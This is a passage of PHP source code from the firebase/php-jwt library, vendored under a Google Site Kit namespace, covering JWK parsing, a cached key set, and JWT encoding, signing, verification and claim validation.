// The "alg" parameter is optional in a KTY, but an algorithm is required // for parsing in this library. Use the $defaultAlg parameter when parsing the // key set in order to prevent this error. // @see https://datatracker.ietf.org/doc/html/rfc7517#section-4.4 throw new \UnexpectedValueException('JWK must contain an "alg" parameter'); } $jwk['alg'] = $defaultAlg; } switch ($jwk['kty']) { case 'RSA': if (!empty($jwk['d'])) { throw new \UnexpectedValueException('RSA private keys are not supported'); } if (!isset($jwk['n']) || !isset($jwk['e'])) { throw new \UnexpectedValueException('RSA keys must contain values for both "n" and "e"'); } $pem = self::createPemFromModulusAndExponent($jwk['n'], $jwk['e']); $publicKey = \openssl_pkey_get_public($pem); if (\false === $publicKey) { throw new \DomainException('OpenSSL error: ' . \openssl_error_string()); } return new \Google\Site_Kit_Dependencies\Firebase\JWT\Key($publicKey, $jwk['alg']); case 'EC': if (isset($jwk['d'])) { // The key is actually a private key throw new \UnexpectedValueException('Key data must be for a public key'); } if (empty($jwk['crv'])) { throw new \UnexpectedValueException('crv not set'); } if (!isset(self::EC_CURVES[$jwk['crv']])) { throw new \DomainException('Unrecognised or unsupported EC curve'); } if (empty($jwk['x']) || empty($jwk['y'])) { throw new \UnexpectedValueException('x and y not set'); } $publicKey = self::createPemFromCrvAndXYCoordinates($jwk['crv'], $jwk['x'], $jwk['y']); return new \Google\Site_Kit_Dependencies\Firebase\JWT\Key($publicKey, $jwk['alg']); case 'OKP': if (isset($jwk['d'])) { // The key is actually a private key throw new \UnexpectedValueException('Key data must be for a public key'); } if (!isset($jwk['crv'])) { throw new \UnexpectedValueException('crv not set'); } if (empty(self::OKP_SUBTYPES[$jwk['crv']])) { throw new \DomainException('Unrecognised or unsupported OKP key subtype'); } if (empty($jwk['x'])) { throw new \UnexpectedValueException('x not set'); } // This library works internally with EdDSA keys (Ed25519) encoded in standard base64. $publicKey = \Google\Site_Kit_Dependencies\Firebase\JWT\JWT::convertBase64urlToBase64($jwk['x']); return new \Google\Site_Kit_Dependencies\Firebase\JWT\Key($publicKey, $jwk['alg']); default: break; } return null; } /** * Converts the EC JWK values to pem format. * * @param string $crv The EC curve (only P-256 & P-384 is supported) * @param string $x The EC x-coordinate * @param string $y The EC y-coordinate * * @return string */ private static function createPemFromCrvAndXYCoordinates(string $crv, string $x, string $y) : string { $pem = self::encodeDER(self::ASN1_SEQUENCE, self::encodeDER(self::ASN1_SEQUENCE, self::encodeDER(self::ASN1_OBJECT_IDENTIFIER, self::encodeOID(self::OID)) . self::encodeDER(self::ASN1_OBJECT_IDENTIFIER, self::encodeOID(self::EC_CURVES[$crv]))) . self::encodeDER(self::ASN1_BIT_STRING, \chr(0x0) . \chr(0x4) . \Google\Site_Kit_Dependencies\Firebase\JWT\JWT::urlsafeB64Decode($x) . \Google\Site_Kit_Dependencies\Firebase\JWT\JWT::urlsafeB64Decode($y))); return \sprintf("-----BEGIN PUBLIC KEY-----\n%s\n-----END PUBLIC KEY-----\n", \wordwrap(\base64_encode($pem), 64, "\n", \true)); } /** * Create a public key represented in PEM format from RSA modulus and exponent information * * @param string $n The RSA modulus encoded in Base64 * @param string $e The RSA exponent encoded in Base64 * * @return string The RSA public key represented in PEM format * * @uses encodeLength */ private static function createPemFromModulusAndExponent(string $n, string $e) : string { $mod = \Google\Site_Kit_Dependencies\Firebase\JWT\JWT::urlsafeB64Decode($n); $exp = \Google\Site_Kit_Dependencies\Firebase\JWT\JWT::urlsafeB64Decode($e); $modulus = \pack('Ca*a*', 2, self::encodeLength(\strlen($mod)), $mod); $publicExponent = \pack('Ca*a*', 2, self::encodeLength(\strlen($exp)), $exp); $rsaPublicKey = \pack('Ca*a*a*', 48, self::encodeLength(\strlen($modulus) + \strlen($publicExponent)), $modulus, $publicExponent); // sequence(oid(1.2.840.113549.1.1.1), null)) = rsaEncryption. $rsaOID = \pack('H*', '300d06092a864886f70d0101010500'); // hex version of MA0GCSqGSIb3DQEBAQUA $rsaPublicKey = \chr(0) . $rsaPublicKey; $rsaPublicKey = \chr(3) . self::encodeLength(\strlen($rsaPublicKey)) . $rsaPublicKey; $rsaPublicKey = \pack('Ca*a*', 48, self::encodeLength(\strlen($rsaOID . $rsaPublicKey)), $rsaOID . $rsaPublicKey); return "-----BEGIN PUBLIC KEY-----\r\n" . \chunk_split(\base64_encode($rsaPublicKey), 64) . '-----END PUBLIC KEY-----'; } /** * DER-encode the length * * DER supports lengths up to (2**8)**127, however, we'll only support lengths up to (2**8)**4. See * {@link http://itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#p=13 X.690 paragraph 8.1.3} for more information. * * @param int $length * @return string */ private static function encodeLength(int $length) : string { if ($length <= 0x7f) { return \chr($length); } $temp = \ltrim(\pack('N', $length), \chr(0)); return \pack('Ca*', 0x80 | \strlen($temp), $temp); } /** * Encodes a value into a DER object. * Also defined in Firebase\JWT\JWT * * @param int $type DER tag * @param string $value the value to encode * @return string the encoded object */ private static function encodeDER(int $type, string $value) : string { $tag_header = 0; if ($type === self::ASN1_SEQUENCE) { $tag_header |= 0x20; } // Type $der = \chr($tag_header | $type); // Length $der .= \chr(\strlen($value)); return $der . $value; } /** * Encodes a string into a DER-encoded OID. * * @param string $oid the OID string * @return string the binary DER-encoded OID */ private static function encodeOID(string $oid) : string { $octets = \explode('.', $oid); // Get the first octet $first = (int) \array_shift($octets); $second = (int) \array_shift($octets); $oid = \chr($first * 40 + $second); // Iterate over subsequent octets foreach ($octets as $octet) { if ($octet == 0) { $oid .= \chr(0x0); continue; } $bin = ''; while ($octet) { $bin .= \chr(0x80 | $octet & 0x7f); $octet >>= 7; } $bin[0] = $bin[0] & \chr(0x7f); // Convert to big endian if necessary if (\pack('V', 65534) == \pack('L', 65534)) { $oid .= \strrev($bin); } else { $oid .= $bin; } } return $oid; } } <?php namespace Google\Site_Kit_Dependencies\Firebase\JWT; class ExpiredException extends \UnexpectedValueException implements \Google\Site_Kit_Dependencies\Firebase\JWT\JWTExceptionWithPayloadInterface { private object $payload; public function setPayload(object $payload) : void { $this->payload = $payload; } public function getPayload() : object { return $this->payload; } } <?php namespace Google\Site_Kit_Dependencies\Firebase\JWT; interface JWTExceptionWithPayloadInterface { /** * Get the payload that caused this exception. * * @return object */ public function getPayload() : object; /** * Get the payload that caused this exception. * * @param object $payload * @return void */ public function setPayload(object $payload) : void; } <?php namespace Google\Site_Kit_Dependencies\Firebase\JWT; use ArrayAccess; use InvalidArgumentException; use LogicException; use OutOfBoundsException; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; use Google\Site_Kit_Dependencies\Psr\Http\Client\ClientInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestFactoryInterface; use RuntimeException; use UnexpectedValueException; /** * @implements ArrayAccess<string, Key> */ class CachedKeySet implements \ArrayAccess { /** * @var string */ private $jwksUri; /** * @var ClientInterface */ private $httpClient; /** * @var RequestFactoryInterface */ private $httpFactory; /** * @var CacheItemPoolInterface */ private $cache; /** * @var ?int */ private $expiresAfter; /** * @var ?CacheItemInterface */ private $cacheItem; /** * @var array<string, array<mixed>> */ private $keySet; /** * @var string */ private $cacheKey; /** * @var string */ private $cacheKeyPrefix = 'jwks'; /** * @var int */ private $maxKeyLength = 64; /** * @var bool */ private $rateLimit; /** * @var string */ private $rateLimitCacheKey; /** * @var int */ private $maxCallsPerMinute = 10; /** * @var string|null */ private $defaultAlg; public function __construct(string $jwksUri, \Google\Site_Kit_Dependencies\Psr\Http\Client\ClientInterface $httpClient, \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestFactoryInterface $httpFactory, \Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache, int $expiresAfter = null, bool $rateLimit = \false, string $defaultAlg = null) { $this->jwksUri = $jwksUri; $this->httpClient = $httpClient; $this->httpFactory = $httpFactory; $this->cache = $cache; $this->expiresAfter = $expiresAfter; $this->rateLimit = $rateLimit; $this->defaultAlg = $defaultAlg; $this->setCacheKeys(); } /** * @param string $keyId * @return Key */ public function offsetGet($keyId) : \Google\Site_Kit_Dependencies\Firebase\JWT\Key { if (!$this->keyIdExists($keyId)) { throw new \OutOfBoundsException('Key ID not found'); } return \Google\Site_Kit_Dependencies\Firebase\JWT\JWK::parseKey($this->keySet[$keyId], $this->defaultAlg); } /** * @param string $keyId * @return bool */ public function offsetExists($keyId) : bool { return $this->keyIdExists($keyId); } /** * @param string $offset * @param Key $value */ public function offsetSet($offset, $value) : void { throw new \LogicException('Method not implemented'); } /** * @param string $offset */ public function offsetUnset($offset) : void { throw new \LogicException('Method not implemented'); } /** * @return array<mixed> */ private function formatJwksForCache(string $jwks) : array { $jwks = \json_decode($jwks, \true); if (!isset($jwks['keys'])) { throw new \UnexpectedValueException('"keys" member must exist in the JWK Set'); } if (empty($jwks['keys'])) { throw new \InvalidArgumentException('JWK Set did not contain any keys'); } $keys = []; foreach ($jwks['keys'] as $k => $v) { $kid = isset($v['kid']) ? $v['kid'] : $k; $keys[(string) $kid] = $v; } return $keys; } private function keyIdExists(string $keyId) : bool { if (null === $this->keySet) { $item = $this->getCacheItem(); // Try to load keys from cache if ($item->isHit()) { // item found! retrieve it $this->keySet = $item->get(); // If the cached item is a string, the JWKS response was cached (previous behavior). // Parse this into expected format array<kid, jwk> instead. if (\is_string($this->keySet)) { $this->keySet = $this->formatJwksForCache($this->keySet); } } } if (!isset($this->keySet[$keyId])) { if ($this->rateLimitExceeded()) { return \false; } $request = $this->httpFactory->createRequest('GET', $this->jwksUri); $jwksResponse = $this->httpClient->sendRequest($request); if ($jwksResponse->getStatusCode() !== 200) { throw new \UnexpectedValueException(\sprintf('HTTP Error: %d %s for URI "%s"', $jwksResponse->getStatusCode(), $jwksResponse->getReasonPhrase(), $this->jwksUri), $jwksResponse->getStatusCode()); } $this->keySet = $this->formatJwksForCache((string) $jwksResponse->getBody()); if (!isset($this->keySet[$keyId])) { return \false; } $item = $this->getCacheItem(); $item->set($this->keySet); if ($this->expiresAfter) { $item->expiresAfter($this->expiresAfter); } $this->cache->save($item); } return \true; } private function rateLimitExceeded() : bool { if (!$this->rateLimit) { return \false; } $cacheItem = $this->cache->getItem($this->rateLimitCacheKey); if (!$cacheItem->isHit()) { $cacheItem->expiresAfter(1); // # of calls are cached each minute } $callsPerMinute = (int) $cacheItem->get(); if (++$callsPerMinute > $this->maxCallsPerMinute) { return \true; } $cacheItem->set($callsPerMinute); $this->cache->save($cacheItem); return \false; } private function getCacheItem() : \Google\Site_Kit_Dependencies\Psr\Cache\CacheItemInterface { if (\is_null($this->cacheItem)) { $this->cacheItem = $this->cache->getItem($this->cacheKey); } return $this->cacheItem; } private function setCacheKeys() : void { if (empty($this->jwksUri)) { throw new \RuntimeException('JWKS URI is empty'); } // ensure we do not have illegal characters $key = \preg_replace('|[^a-zA-Z0-9_\\.!]|', '', $this->jwksUri); // add prefix $key = $this->cacheKeyPrefix . $key; // Hash keys if they exceed $maxKeyLength of 64 if (\strlen($key) > $this->maxKeyLength) { $key = \substr(\hash('sha256', $key), 0, $this->maxKeyLength); } $this->cacheKey = $key; if ($this->rateLimit) { // add prefix $rateLimitKey = $this->cacheKeyPrefix . 'ratelimit' . $key; // Hash keys if they exceed $maxKeyLength of 64 if (\strlen($rateLimitKey) > $this->maxKeyLength) { $rateLimitKey = \substr(\hash('sha256', $rateLimitKey), 0, $this->maxKeyLength); } $this->rateLimitCacheKey = $rateLimitKey; } } } <?php namespace Google\Site_Kit_Dependencies\Firebase\JWT; class BeforeValidException extends \UnexpectedValueException implements \Google\Site_Kit_Dependencies\Firebase\JWT\JWTExceptionWithPayloadInterface { private object $payload; public function setPayload(object $payload) : void { $this->payload = $payload; } public function getPayload() : object { return $this->payload; } } <?php namespace Google\Site_Kit_Dependencies\Firebase\JWT; use InvalidArgumentException; use OpenSSLAsymmetricKey; use OpenSSLCertificate; use TypeError; class Key { /** @var string|resource|OpenSSLAsymmetricKey|OpenSSLCertificate */ private $keyMaterial; /** @var string */ private $algorithm; /** * @param string|resource|OpenSSLAsymmetricKey|OpenSSLCertificate $keyMaterial * @param string $algorithm */ public function __construct($keyMaterial, string $algorithm) { if (!\is_string($keyMaterial) && !$keyMaterial instanceof \OpenSSLAsymmetricKey && !$keyMaterial instanceof \OpenSSLCertificate && !\is_resource($keyMaterial)) { throw new \TypeError('Key material must be a string, resource, or OpenSSLAsymmetricKey'); } if (empty($keyMaterial)) { throw new \InvalidArgumentException('Key material must not be empty'); } if (empty($algorithm)) { throw new \InvalidArgumentException('Algorithm must not be empty'); } // TODO: Remove in PHP 8.0 in favor of class constructor property promotion $this->keyMaterial = $keyMaterial; $this->algorithm = $algorithm; } /** * Return the algorithm valid for this key * * @return string */ public function getAlgorithm() : string { return $this->algorithm; } /** * @return string|resource|OpenSSLAsymmetricKey|OpenSSLCertificate */ public function getKeyMaterial() { return $this->keyMaterial; } } <?php namespace Google\Site_Kit_Dependencies\Firebase\JWT; use ArrayAccess; use DateTime; use DomainException; use Exception; use InvalidArgumentException; use OpenSSLAsymmetricKey; use OpenSSLCertificate; use stdClass; use UnexpectedValueException; /** * JSON Web Token implementation, based on this spec: * https://tools.ietf.org/html/rfc7519 * * PHP version 5 * * @category Authentication * @package Authentication_JWT * @author Neuman Vong <neuman@twilio.com> * @author Anant Narayanan <anant@php.net> * @license http://opensource.org/licenses/BSD-3-Clause 3-clause BSD * @link https://github.com/firebase/php-jwt */ class JWT { private const ASN1_INTEGER = 0x2; private const ASN1_SEQUENCE = 0x10; private const ASN1_BIT_STRING = 0x3; /** * When checking nbf, iat or expiration times, * we want to provide some extra leeway time to * account for clock skew. * * @var int */ public static $leeway = 0; /** * Allow the current timestamp to be specified. * Useful for fixing a value within unit testing. * Will default to PHP time() value if null. * * @var ?int */ public static $timestamp = null; /** * @var array<string, string[]> */ public static $supported_algs = ['ES384' => ['openssl', 'SHA384'], 'ES256' => ['openssl', 'SHA256'], 'ES256K' => ['openssl', 'SHA256'], 'HS256' => ['hash_hmac', 'SHA256'], 'HS384' => ['hash_hmac', 'SHA384'], 'HS512' => ['hash_hmac', 'SHA512'], 'RS256' => ['openssl', 'SHA256'], 'RS384' => ['openssl', 'SHA384'], 'RS512' => ['openssl', 'SHA512'], 'EdDSA' => ['sodium_crypto', 'EdDSA']]; /** * Decodes a JWT string into a PHP object. * * @param string $jwt The JWT * @param Key|ArrayAccess<string,Key>|array<string,Key> $keyOrKeyArray The Key or associative array of key IDs * (kid) to Key objects. * If the algorithm used is asymmetric, this is * the public key. * Each Key object contains an algorithm and * matching key. * Supported algorithms are 'ES384','ES256', * 'HS256', 'HS384', 'HS512', 'RS256', 'RS384' * and 'RS512'. * @param stdClass $headers Optional. Populates stdClass with headers. * * @return stdClass The JWT's payload as a PHP object * * @throws InvalidArgumentException Provided key/key-array was empty or malformed * @throws DomainException Provided JWT is malformed * @throws UnexpectedValueException Provided JWT was invalid * @throws SignatureInvalidException Provided JWT was invalid because the signature verification failed * @throws BeforeValidException Provided JWT is trying to be used before it's eligible as defined by 'nbf' * @throws BeforeValidException Provided JWT is trying to be used before it's been created as defined by 'iat' * @throws ExpiredException Provided JWT has since expired, as defined by the 'exp' claim * * @uses jsonDecode * @uses urlsafeB64Decode */ public static function decode(string $jwt, $keyOrKeyArray, \stdClass &$headers = null) : \stdClass { // Validate JWT $timestamp = \is_null(static::$timestamp) ? \time() : static::$timestamp; if (empty($keyOrKeyArray)) { throw new \InvalidArgumentException('Key may not be empty'); } $tks = \explode('.', $jwt); if (\count($tks) !== 3) { throw new \UnexpectedValueException('Wrong number of segments'); } list($headb64, $bodyb64, $cryptob64) = $tks; $headerRaw = static::urlsafeB64Decode($headb64); if (null === ($header = static::jsonDecode($headerRaw))) { throw new \UnexpectedValueException('Invalid header encoding'); } if ($headers !== null) { $headers = $header; } $payloadRaw = static::urlsafeB64Decode($bodyb64); if (null === ($payload = static::jsonDecode($payloadRaw))) { throw new \UnexpectedValueException('Invalid claims encoding'); } if (\is_array($payload)) { // prevent PHP Fatal Error in edge-cases when payload is empty array $payload = (object) $payload; } if (!$payload instanceof \stdClass) { throw new \UnexpectedValueException('Payload must be a JSON object'); } $sig = static::urlsafeB64Decode($cryptob64); if (empty($header->alg)) { throw new \UnexpectedValueException('Empty algorithm'); } if (empty(static::$supported_algs[$header->alg])) { throw new \UnexpectedValueException('Algorithm not supported'); } $key = self::getKey($keyOrKeyArray, \property_exists($header, 'kid') ? $header->kid : null); // Check the algorithm if (!self::constantTimeEquals($key->getAlgorithm(), $header->alg)) { // See issue #351 throw new \UnexpectedValueException('Incorrect key for this algorithm'); } if (\in_array($header->alg, ['ES256', 'ES256K', 'ES384'], \true)) { // OpenSSL expects an ASN.1 DER sequence for ES256/ES256K/ES384 signatures $sig = self::signatureToDER($sig); } if (!self::verify("{$headb64}.{$bodyb64}", $sig, $key->getKeyMaterial(), $header->alg)) { throw new \Google\Site_Kit_Dependencies\Firebase\JWT\SignatureInvalidException('Signature verification failed'); } // Check the nbf if it is defined. This is the time that the // token can actually be used. If it's not yet that time, abort. if (isset($payload->nbf) && \floor($payload->nbf) > $timestamp + static::$leeway) { $ex = new \Google\Site_Kit_Dependencies\Firebase\JWT\BeforeValidException('Cannot handle token with nbf prior to ' . \date(\DateTime::ISO8601, (int) $payload->nbf)); $ex->setPayload($payload); throw $ex; } // Check that this token has been created before 'now'. This prevents // using tokens that have been created for later use (and haven't // correctly used the nbf claim). if (!isset($payload->nbf) && isset($payload->iat) && \floor($payload->iat) > $timestamp + static::$leeway) { $ex = new \Google\Site_Kit_Dependencies\Firebase\JWT\BeforeValidException('Cannot handle token with iat prior to ' . \date(\DateTime::ISO8601, (int) $payload->iat)); $ex->setPayload($payload); throw $ex; } // Check if this token has expired. if (isset($payload->exp) && $timestamp - static::$leeway >= $payload->exp) { $ex = new \Google\Site_Kit_Dependencies\Firebase\JWT\ExpiredException('Expired token'); $ex->setPayload($payload); throw $ex; } return $payload; } /** * Converts and signs a PHP array into a JWT string. * * @param array<mixed> $payload PHP array * @param string|resource|OpenSSLAsymmetricKey|OpenSSLCertificate $key The secret key. * @param string $alg Supported algorithms are 'ES384','ES256', 'ES256K', 'HS256', * 'HS384', 'HS512', 'RS256', 'RS384', and 'RS512' * @param string $keyId * @param array<string, string> $head An array with header elements to attach * * @return string A signed JWT * * @uses jsonEncode * @uses urlsafeB64Encode */ public static function encode(array $payload, $key, string $alg, string $keyId = null, array $head = null) : string { $header = ['typ' => 'JWT']; if (isset($head) && \is_array($head)) { $header = \array_merge($header, $head); } $header['alg'] = $alg; if ($keyId !== null) { $header['kid'] = $keyId; } $segments = []; $segments[] = static::urlsafeB64Encode((string) static::jsonEncode($header)); $segments[] = static::urlsafeB64Encode((string) static::jsonEncode($payload)); $signing_input = \implode('.', $segments); $signature = static::sign($signing_input, $key, $alg); $segments[] = static::urlsafeB64Encode($signature); return \implode('.', $segments); } /** * Sign a string with a given key and algorithm. * * @param string $msg The message to sign * @param string|resource|OpenSSLAsymmetricKey|OpenSSLCertificate $key The secret key. * @param string $alg Supported algorithms are 'EdDSA', 'ES384', 'ES256', 'ES256K', 'HS256', * 'HS384', 'HS512', 'RS256', 'RS384', and 'RS512' * * @return string An encrypted message * * @throws DomainException Unsupported algorithm or bad key was specified */ public static function sign(string $msg, $key, string $alg) : string { if (empty(static::$supported_algs[$alg])) { throw new \DomainException('Algorithm not supported'); } list($function, $algorithm) = static::$supported_algs[$alg]; switch ($function) { case 'hash_hmac': if (!\is_string($key)) { throw new \InvalidArgumentException('key must be a string when using hmac'); } return \hash_hmac($algorithm, $msg, $key, \true); case 'openssl': $signature = ''; $success = \openssl_sign($msg, $signature, $key, $algorithm); // @phpstan-ignore-line if (!$success) { throw new \DomainException('OpenSSL unable to sign data'); } if ($alg === 'ES256' || $alg === 'ES256K') { $signature = self::signatureFromDER($signature, 256); } elseif ($alg === 'ES384') { $signature = self::signatureFromDER($signature, 384); } return $signature; case 'sodium_crypto': if (!\function_exists('sodium_crypto_sign_detached')) { throw new \DomainException('libsodium is not available'); } if (!\is_string($key)) { throw new \InvalidArgumentException('key must be a string when using EdDSA'); } try { // The last non-empty line is used as the key. $lines = \array_filter(\explode("\n", $key)); $key = \base64_decode((string) \end($lines)); if (\strlen($key) === 0) { throw new \DomainException('Key cannot be empty string'); } return \sodium_crypto_sign_detached($msg, $key); } catch (\Exception $e) { throw new \DomainException($e->getMessage(), 0, $e); } } throw new \DomainException('Algorithm not supported'); } /** * Verify a signature with the message, key and method. Not all methods * are symmetric, so we must have a separate verify and sign method. * * @param string $msg The original message (header and body) * @param string $signature The original signature * @param string|resource|OpenSSLAsymmetricKey|OpenSSLCertificate $keyMaterial For Ed*, ES*, HS*, a string key works. for RS*, must be an instance of OpenSSLAsymmetricKey * @param string $alg The algorithm * * @return bool * * @throws DomainException Invalid Algorithm, bad key, or OpenSSL failure */ private static function verify(string $msg, string $signature, $keyMaterial, string $alg) : bool { if (empty(static::$supported_algs[$alg])) { throw new \DomainException('Algorithm not supported'); } list($function, $algorithm) = static::$supported_algs[$alg]; switch ($function) { case 'openssl': $success = \openssl_verify($msg, $signature, $keyMaterial, $algorithm); // @phpstan-ignore-line if ($success === 1) { return \true; } if ($success === 0) { return \false; } // returns 1 on success, 0 on failure, -1 on error. throw new \DomainException('OpenSSL error: ' . \openssl_error_string()); case 'sodium_crypto': if (!\function_exists('sodium_crypto_sign_verify_detached')) { throw new \DomainException('libsodium is not available'); } if (!\is_string($keyMaterial)) { throw new \InvalidArgumentException('key must be a string when using EdDSA'); } try { // The last non-empty line is used as the key. $lines = \array_filter(\explode("\n", $keyMaterial)); $key = \base64_decode((string) \end($lines)); if (\strlen($key) === 0) { throw new \DomainException('Key cannot be empty string'); } if (\strlen($signature) === 0) { throw new \DomainException('Signature cannot be empty string'); } return \sodium_crypto_sign_verify_detached($signature, $msg, $key); } catch (\Exception $e) { throw new \DomainException($e->getMessage(), 0, $e); } case 'hash_hmac': default: if (!\is_string($keyMaterial)) { throw new \InvalidArgumentException('key must be a string when using hmac'); } $hash = \hash_hmac($algorithm, $msg, $keyMaterial, \true); return self::constantTimeEquals($hash, $signature); } } /** * Decode a JSON string into a PHP object. * * @param string $input JSON string * * @return mixed The decoded JSON string * * @throws DomainException Provided string was invalid JSON */ public static function jsonDecode(string $input) { $obj = \json_decode($input, \false, 512, \JSON_BIGINT_AS_STRING); if ($errno = \json_last_error()) { self::handleJsonError($errno); } elseif ($obj === null && $input !== 'null') { throw new \DomainException('Null result with non-null input'); } return $obj; } /** * Encode a PHP array into a JSON string. * * @param array<mixed> $input A PHP array * * @return string JSON representation of the PHP array * * @throws DomainException Provided object could not be encoded to valid JSON */ public static function jsonEncode(array $input) : string { if (\PHP_VERSION_ID >= 50400) { $json = \json_encode($input, \JSON_UNESCAPED_SLASHES); } else { // PHP 5.3 only $json = \json_encode($input); } if ($errno = \json_last_error()) { self::handleJsonError($errno); } elseif ($json === 'null') { throw new \DomainException('Null result with non-null input'); } if ($json === \false) { throw new \DomainException('Provided object could not be encoded to valid JSON'); } return $json; } /** * Decode a string with URL-safe Base64. * * @param string $input A Base64 encoded string * * @return string A decoded string * * @throws InvalidArgumentException invalid base64 characters */ public static function urlsafeB64Decode(string $input) : string { return \base64_decode(self::convertBase64UrlToBase64($input)); } /** * Convert a string in the base64url (URL-safe Base64) encoding to standard base64. * * @param string $input A Base64 encoded string with URL-safe characters (-_ and no padding) * * @return string A Base64 encoded string with standard characters (+/) and padding (=), when * needed. * * @see https://www.rfc-editor.org/rfc/rfc4648 */ public static function convertBase64UrlToBase64(string $input) : string { $remainder = \strlen($input) % 4; if ($remainder) { $padlen = 4 - $remainder; $input .= \str_repeat('=', $padlen); } return \strtr($input, '-_', '+/'); } /** * Encode a string with URL-safe Base64. * * @param string $input The string you want encoded * * @return string The base64 encode of what you passed in */ public static function urlsafeB64Encode(string $input) : string { return \str_replace('=', '', \strtr(\base64_encode($input), '+/', '-_')); } /** * Determine if an algorithm has been provided for each Key * * @param Key|ArrayAccess<string,Key>|array<string,Key> $keyOrKeyArray * @param string|null $kid * * @throws UnexpectedValueException * * @return Key */ private static function getKey($keyOrKeyArray, ?string $kid) : \Google\Site_Kit_Dependencies\Firebase\JWT\Key { if ($keyOrKeyArray instanceof \Google\Site_Kit_Dependencies\Firebase\JWT\Key) { return $keyOrKeyArray; } if (empty($kid) && $kid !== '0') { throw new \UnexpectedValueException('"kid" empty, unable to lookup correct key'); } if ($keyOrKeyArray instanceof \Google\Site_Kit_Dependencies\Firebase\JWT\CachedKeySet) { // Skip "isset" check, as this will automatically refresh if not set return $keyOrKeyArray[$kid]; } if (!isset($keyOrKeyArray[$kid])) { throw new \UnexpectedValueException('"kid" invalid, unable to lookup correct key'); } return $keyOrKeyArray[$kid]; } /** * @param string $left The string of known length to compare against * @param string $right The user-supplied string * @return bool */ public static function constantTimeEquals(string $left, string $right) : bool { if (\function_exists('hash_equals')) { return \hash_equals($left, $right); } $len = \min(self::safeStrlen($left), self::safeStrlen($right)); $status = 0; for ($i = 0; $i < $len; $i++) { $status |= \ord($left[$i]) ^ \ord($right[$i]); } $status |= self::safeStrlen($left) ^ self::safeStrlen($right); return $status === 0; } /** * Helper method to create a JSON error. * * @param int $errno An error number from json_last_error() * * @throws DomainException * * @return void */ private static function handleJsonError(int $errno) : void { $messages = [\JSON_ERROR_DEPTH => 'Maximum stack depth exceeded', \JSON_ERROR_STATE_MISMATCH => 'Invalid or malformed JSON', \JSON_ERROR_CTRL_CHAR => 'Unexpected control character found', \JSON_ERROR_SYNTAX => 'Syntax error, malformed JSON', \JSON_ERROR_UTF8 => 'Malformed UTF-8 characters']; throw new \DomainException(isset($messages[$errno]) ? $messages[$errno] : 'Unknown JSON error: ' . $errno); } /** * Get the number of bytes in cryptographic strings. * * @param string $str * * @return int */ private static function safeStrlen(string $str) : int { if (\function_exists('mb_strlen')) { return \mb_strlen($str, '8bit'); } return \strlen($str); } /** * Convert an ECDSA signature to an ASN.1 DER sequence * * @param string $sig The ECDSA signature to convert * @return string The encoded DER object */ private static function signatureToDER(string $sig) : string { // Separate the signature into r-value and s-value $length = \max(1, (int) (\strlen($sig) / 2)); list($r, $s) = \str_split($sig, $length); // Trim leading zeros $r = \ltrim($r, "\x00"); $s = \ltrim($s, "\x00"); // Convert r-value and s-value from unsigned big-endian integers to // signed two's complement if (\ord($r[0]) > 0x7f) { $r = "\x00" . $r; } if (\ord($s[0]) > 0x7f) { $s = "\x00" . $s; } return self::encodeDER(self::ASN1_SEQUENCE, self::encodeDER(self::ASN1_INTEGER, $r) . self::encodeDER(self::ASN1_INTEGER, $s)); } /** * Encodes a value into a DER object. * * @param int $type DER tag * @param string $value the value to encode * * @return string the encoded object */ private static function encodeDER(int $type, string $value) : string { $tag_header = 0; if ($type === self::ASN1_SEQUENCE) { $tag_header |= 0x20; } // Type $der = \chr($tag_header | $type); // Length $der .= \chr(\strlen($value)); return $der . $value; } /** * Encodes signature from a DER object. * * @param string $der binary signature in DER format * @param int $keySize the number of bits in the key * * @return string the signature */ private static function signatureFromDER(string $der, int $keySize) : string { // OpenSSL returns the ECDSA signatures as a binary ASN.1 DER SEQUENCE list($offset, $_) = self::readDER($der); list($offset, $r) = self::readDER($der, $offset); list($offset, $s) = self::readDER($der, $offset); // Convert r-value and s-value from signed two's compliment to unsigned // big-endian integers $r = \ltrim($r, "\x00"); $s = \ltrim($s, "\x00"); // Pad out r and s so that they are $keySize bits long $r = \str_pad($r, $keySize / 8, "\x00", \STR_PAD_LEFT); $s = \str_pad($s, $keySize / 8, "\x00", \STR_PAD_LEFT); return $r . $s; } /** * Reads binary DER-encoded data and decodes into a single object * * @param string $der the binary data in DER format * @param int $offset the offset of the data stream containing the object * to decode * * @return array{int, string|null} the new offset and the decoded object */ private static function readDER(string $der, int $offset = 0) : array { $pos = $offset; $size = \strlen($der); $constructed = \ord($der[$pos]) >> 5 & 0x1; $type = \ord($der[$pos++]) & 0x1f; // Length $len = \ord($der[$pos++]); if ($len & 0x80) { $n = $len & 0x1f; $len = 0; while ($n-- && $pos < $size) { $len = $len << 8 | \ord($der[$pos++]); } } // Value if ($type === self::ASN1_BIT_STRING) { $pos++; // Skip the first contents octet (padding indicator) $data = \substr($der, $pos, $len - 1); $pos += $len - 1; } elseif (!$constructed) { $data = \substr($der, $pos, $len); $pos += $len; } else { $data = null; } return [$pos, $data]; } } <?php namespace Google\Site_Kit_Dependencies\Firebase\JWT; class SignatureInvalidException extends \UnexpectedValueException { } <?php namespace Google\Site_Kit_Dependencies\Psr\Cache; /** * CacheItemPoolInterface generates CacheItemInterface objects. * * The primary purpose of Cache\CacheItemPoolInterface is to accept a key from * the Calling Library and return the associated Cache\CacheItemInterface object. * It is also the primary point of interaction with the entire cache collection. * All configuration and initialization of the Pool is left up to an * Implementing Library. */ interface CacheItemPoolInterface { /** * Returns a Cache Item representing the specified key. * * This method must always return a CacheItemInterface object, even in case of * a cache miss. It MUST NOT return null. * * @param string $key * The key for which to return the corresponding Cache Item. * * @throws InvalidArgumentException * If the $key string is not a legal value a \Psr\Cache\InvalidArgumentException * MUST be thrown. * * @return CacheItemInterface * The corresponding Cache Item. */ public function getItem($key); /** * Returns a traversable set of cache items. * * @param string[] $keys * An indexed array of keys of items to retrieve. * * @throws InvalidArgumentException * If any of the keys in $keys are not a legal value a \Psr\Cache\InvalidArgumentException * MUST be thrown. * * @return array|\Traversable * A traversable collection of Cache Items keyed by the cache keys of * each item. A Cache item will be returned for each key, even if that * key is not found. However, if no keys are specified then an empty * traversable MUST be returned instead. */ public function getItems(array $keys = array()); /** * Confirms if the cache contains specified cache item. * * Note: This method MAY avoid retrieving the 